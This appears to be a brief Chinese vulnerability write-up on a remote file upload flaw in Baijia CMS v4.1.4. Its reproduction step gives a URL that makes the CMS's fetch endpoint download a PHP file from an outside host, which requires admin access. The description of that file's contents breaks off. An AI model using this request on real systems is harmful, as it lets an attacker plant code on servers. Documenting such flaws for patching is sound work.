# 百家cms v4.1.4 远程文件上传漏洞
### 一、漏洞简介
### 二、漏洞影响
百家cms v4.1.4
### 三、复现过程
“`bash
# 需要后台权限
http://url/index.php?mod=web&do=file&m=public&op=fetch&url=http://xx.xx.xx.xx/test/test.php
“`
远程服务器起一个/test/test.php,内容为**
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后查看评论内容